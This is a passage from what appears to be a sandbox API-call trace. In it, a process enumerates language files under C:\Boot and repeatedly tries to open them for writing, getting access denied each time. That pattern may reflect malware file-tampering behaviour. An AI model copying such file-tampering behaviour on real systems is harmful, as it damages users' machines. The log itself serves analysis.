nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0084.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0084.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.324] AreFileApisANSI () returned 1 [0084.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0084.324] AreFileApisANSI () returned 1 [0084.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0084.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 35 [0084.325] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.325] GetFileType (hFile=0x348) returned 0x1 [0084.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0084.325] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.325] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.325] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.325] CloseHandle (hObject=0x348) returned 1 [0084.326] AreFileApisANSI () returned 1 [0084.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0084.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 35 [0084.326] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.326] GetLastError () returned 0x5 [0084.326] GetLastError () returned 0x5 [0084.326] SetLastError (dwErrCode=0x5) [0084.326] GetLastError () returned 0x5 [0084.326] SetLastError (dwErrCode=0x5) [0084.326] GetLastError () returned 0x5 [0084.326] SetLastError (dwErrCode=0x5) [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.326] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0084.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.327] AreFileApisANSI () returned 1 [0084.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.327] AreFileApisANSI () returned 1 [0084.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0084.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 35 [0084.328] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.328] GetFileType (hFile=0x348) returned 0x1 [0084.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0084.328] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.328] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.328] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.328] CloseHandle (hObject=0x348) returned 1 [0084.328] AreFileApisANSI () returned 1 [0084.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0084.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0084.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 35 [0084.329] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.329] GetLastError () returned 0x5 [0084.329] GetLastError () returned 0x5 [0084.329] SetLastError (dwErrCode=0x5) [0084.329] GetLastError () returned 0x5 [0084.329] SetLastError (dwErrCode=0x5) [0084.329] GetLastError () returned 0x5 [0084.329] SetLastError (dwErrCode=0x5) [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0084.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.329] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x44, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6dc68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x44, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧꽘")) returned 0 [0084.329] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0084.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0084.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.330] AreFileApisANSI () returned 1 [0084.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-RS", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-RS", lpUsedDefaultChar=0x0) returned 19 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.330] AreFileApisANSI () returned 1 [0084.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0084.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a908 [0084.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS") returned 19 [0084.331] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS" (normalized: "c:\\boot\\sr-latn-rs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.331] GetLastError () returned 0x5 [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0084.331] AreFileApisANSI () returned 1 [0084.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0084.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a8a8 [0084.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS") returned 19 [0084.331] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS" (normalized: "c:\\boot\\sr-latn-rs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.331] GetLastError () returned 0x5 [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] GetLastError () returned 0x5 [0084.331] SetLastError (dwErrCode=0x5) [0084.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0084.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.332] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.332] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.332] HeapFree (in: hHeap=0x20000, 